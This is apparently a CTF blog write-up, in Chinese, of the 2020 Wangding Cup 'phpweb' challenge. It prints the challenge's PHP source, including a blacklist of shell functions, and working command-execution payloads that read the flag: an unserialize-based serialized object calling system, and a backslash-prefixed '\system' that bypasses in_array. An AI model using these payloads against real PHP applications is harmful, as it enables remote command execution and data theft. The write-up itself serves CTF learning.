[网鼎杯2020—WEB]phpweb详细题解(php反序列化、代审、命令执行)

最新推荐文章于 2025-02-03 11:55:19 发布
最新推荐文章于 2025-02-03 11:55:19 发布
阅读量687 收藏 16
点赞数 15
分类专栏: 代码审计 CTF 文章标签: php 网络安全 经验分享 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74051295/article/details/144504349
版权

打开题目,等待几秒钟,会发现几秒之后跳出来了一个警告

 抓包看一下,发现存在POST传参,并且传递了两个参数,一个是func​、一个是p

 

 对两个参数与返回值进行分析,我们使用date时一般是这种格式:

date("Y-m-d+h:i:s+a")

那我们可以猜测func参数接受的是一个函数,p参数接受的是函数执行的内容,我们可以输入参数md5和1进行测试,结果如下:

经过验证,确实是回显出了1的MD5值

 测试发现,后台是用了call_user_func()​函数,而func是第一个参数,p是第二个参数

 

可以利用函数show_source​看一下index.php​的源文件,构建payload,POST​传参,我们可以看到回显是Hacker​,明显不是我们想要的源码,所以就要多尝试几个函数 

 

func=file_get_contents&p=index.php

 下面就是得到的PHP源码,下面就是PHP代码审计的环节了

<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];
 
    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

 

反序列化法

注意到没有把反序列函数unserialize​给禁掉,所以这题我们可以利用反序列化,先构造一个类

<?php
class Test {
    var $p = "find / -name flag*";
    var $func = "system";
}
 
$a=new Test();
echo serialize($a);
?>

将反序列化的结进行GET请求后,快速查看网页源代码,不然整个页面一直再刷新,可能看不到。

 我们会发现,第一个最可疑,与其他的不太一样,确定flag位置

/tmp/flagoefiu4r93

再用cat命令打开看看,构造payload​

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}

 可以得到flag

命令行绕过法

原理:在php中,函数加上\​号不会影响函数本身,因为in_array​函数过滤不够严谨,所以我们可以利用加上\号来绕过该函数,直接命令执行,构造payload,先找一下flag位置

那么问题来了:为什么使用此payload:?func=\system&p=find / -name flag*,即可绕过in_arry函数的检测?

?func=\system&p=find / -name flag*

: 因为代码中对用户传入的 $func​ 变量进行了转为小写的处理 strtolower($func)​,但是并没有移除或过滤掉反斜杠,所以 \system​ 并没有和禁用函数列表 array("exec","system",...)​ 中的 system​ 完全匹配。

 in_array()​ 函数是用来判断给定的值是否存在于数组中的,而它是基于字符串的**全等匹配**(相当于 === 比较)。也就是说,in_array()​ 会比较 \system​ 和 system​,由于它们并不完全相同,检测会失败,因此 \system​ 不会被禁用列表中的 system​ 匹配到。

再使用tac函数打开flag (这里博主喜欢用tac,因为打ctf的时候,出题人比较喜欢讲flag藏到末尾,用tac使其从后往前输出,更容易快速找到flag

 感谢各位师傅的耐心观看

[羊城 2020]easyser - 反序列化+SSRF+伪协议(绕过死亡die)
oZuoShen123的博客
10-08 1169
F12看提示: 小胖说用个不安全的协议从我家才能进ser.php呢! ! 意思就是http协议就能进ser.php,回顾一下http协议咋用的?……
CTFshow 反序列化入门 web259
weixin_46099552的博客
09-05 326
CTFshow web259
2020--朱雀组-Web-phpweb
feng的博客
11-01 534
前言 我是废物。。越学越回去了,现在连怎么读源码都想不起来了,天天直接getshell,getshell的,最基本的读文件源码的函数都忘得一干二净了。 WP 进入环境,经过一系列的信息收集,发现了POST传入的func的函数名,p传入的是参数,尝试执行命令,以及一些其他的php函数,都失败了。然后就卡住了。。 觉得这题的关键点在index.php的源码里,我尝试去找备份文件,git泄露之类的,都没有。。。自己都可以命令执行了,为什么想不起来读源码呢。。。 这里读源码都两种方式,分别是: func=file_
[ 2020 朱雀组]之phpweb
snowlyzz的博客
05-10 1254
打开页面: 还以为是csgo里的JAME呢,没想到是孙笑川。。。 F12查看源码,和观察的一样,setTimeout("document.form1.submit()",5000)每隔五秒钟将会提交一次form1,然后是一串时间字符串2021-10-20 12:14:50 pm 这里提交了两个值,一个是func 值是date 另一个是p 值是 Y-m-d h:i:s 猜想一下,如果func的值是 system ,p的值是ls /flag呢? 可以先用md5来校验一下是否能够成功执行 ...
[ 2020 朱雀组]phpweb 1
weixin_53150482的博客
07-13 499
[ 2020 朱雀组]phpweb 1
一道web题(fakebook)
热门推荐
洞若观火
08-23 1万+
扫描: nikto扫描: 发现隐藏的robots.txt,其中有源码泄漏(/user.php.bak),输入到地址栏,得到文件user.php.bak。然后用御剑扫描,发现flag.php。 user.php.bak源码: &lt;?php class UserInfo {     public $name = "";     public $age = 0;     public $...
2024-第二次模拟练习-web02
风飘红技术中心
10-26 807
简单记录下做题情况
BUUCTF_[ 2020 朱雀组]phpweb反序列化绕过命令)
2401_87524087的博客
02-02 1139
打开靶场,,弹出上面的提示,是一个警告warning,而且页面每隔几秒就会刷新一次,根据warning中的信息以及信息中的时间一直在变,可以猜测是date()函数一直在被调用查看页面源代码,没有什么有用的信息Burp抓包一下调用了date()函数并回显在页面上,参数func是函数名,p是参数值func=datedatedatepdatedateYmdhisaampm。
ctf_show笔记篇(web入门---反序列化
whale_waves的博客
03-19 2167
例如$a = 1 $b = 2, 这时让$b = &$a, 再给$a 重新赋个值 $a = 3, 这个时候$b就会一直跟着$a变化, $a是什么$b就是什么。利用php处理畸形的序列化的处理措施, 当php收到畸形的序列化时, 会因为对此序列化的不放心, 会第一时间处理掉它, 所以能直接让处理他的顺序排在了最前面。这时, 如果传入一个|O:5:"Class"类似于这样的序列化, php就会自动把|前面的当作键名用, 反而会反序列化|后的值。
祥云Web题解:深入探讨SSRF与Yii框架反序列化漏洞
"第二届祥云 Web 题解1 - 考察 SSRF、session 条件竞争以及 PHP 反序列化利用" 在此次祥云网络安全竞赛中,题目涉及了三个主要知识点:SSRF(Server-Side Request Forgery)、session 条件竞争以及 PHP 反序列...
-2018-Web-Unfinish
m0_63050933的博客
08-12 833
经过尝试,构造username=select database(),登录后显示用户名还是为select database(),说明后台代码可能把username用单引号引起来了,导致其无法显示。如果万能注入缺少符号,如果加@符又进不去,那我们尝试扫描文件,然后发现有一个register.php的文件,应该是注册页面,我们去打开。getUsername=soup.find_all('span')[0]#获取用户名。我们注册的用户名就是aaa,可以看出它回显出来了,我们尝试从这个地方注入。
第四十三题——[ 2020 朱雀组]phpweb
分享简单的安全技术
04-26 407
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,发现页面弹出错误提示,使用burpsuite抓包发现POST参数 第二步:分析 从页上的错误提示看出执行了date()函数,有可能func参数需要传入函数名,并用p参数传输的数据作为参数执行传入的函数。 第四步:验证 func传入readfile,p传入index.php,使用readfile函数读取index.php,发现成功读取index.php源码 <?php $disable_
[ 2020 朱雀组]之phpweb两种不同的解题方式
sGanYu
10-21 8997
目录 方法一: 方法二: 知识点: 1)黑名单取巧绕过 2)PHP的file_get_contents函数使用 3)PHP序列化与反序列化构造 访问靶机,观察页面,开始时首先加载了一张图片,随后刷新回显时间,并且页每隔一段时间会刷新一次,频率大概五秒一次 F12查看源码,和观察的一样,setTimeout("document.form1.submit()",5000)每隔五秒钟将会提交一次form1,然后是一串时间字符串2021-10-20 12:14:50 pm .
web:[ 2020 青龙组]AreUSerialz
sleepywin的博客
10-30 3737
这里有__destruct()函数,在对象销毁时自动调用,根据$op属性的值进行一些操作,并重置属性的值,后再次调用process()方法,同时该函数会根据op变量值的不同,会相应调用读写函数。总体解题思路为,构造反序列化给str变量,当主函数进行反序列化时,调用了FileHandler类,读取flag.php。接收到名为str的get参数,参数会被反序列化,并创建一个对象,在反序列化之前,会使用。2.php的序列化字符串中只要把其中的s改成大写的S,后面的字符串就可以用十六进制表示。
记录:2024赛前-模拟-WEB01
轻舟已过万重山
10-20 1533
这里生成 的flag是随机的,因为烽火台反作弊会随机生成环境,在一顿查找后,在home目录下找到flag(flag不能泄露,会监测串flag)编写蚁剑一句话木马直接上传。目录扫描,发现上传点。
2025.2.2——二、[ 2020 朱雀组]phpweb 代码审计|反序列化
最新发布
2402_87387800的博客
02-03 671
题目来源:BUUCTF [ 2020 朱雀组]phpweb
-青龙组-Web-Wp
XunanSec的博客
05-26 1658
0x01 开局一张图 一看就知道让我们代码审计 对于这种一长串的源码,还是逐步来解把 首先的解题思路就是查看CTF题目的命名和代码函数 CTF题目这里命名为AreUSerialz,我反正一眼看不出什么端详,打的CTF比较少,直接看函数名字 在下面可以看到有一个unserialize()函数,那这一题基本上就是考反序列化的知识了。 我们整体的浏览一边代码,来看一下程序的大概走向。 <?php include("flag.php"); highlight_file(__FILE__); cl
2020 web题 writeup
k851819815的博客
05-10 3346
AreUSerialz(反序列化) 题目源代码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile";
2018(PWN)第一场解题记录(Writeup)
SWEET0SWAT的博客
08-21 1万+
MISC   clip     使用十六进制查看软件打开,查找的过程中发现有idat头:       还有一处在下方,表示还有另一张图片      但是这里缺少头部需要手动补充上去再另存文件:      一共提取出两张图片,但是图片明显被处理过了         其实不明白出题人为什么要弄成这样,CTF比赛还要弄成这样纯粹就是刁难,弄得眼睛贼疼。   minified...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值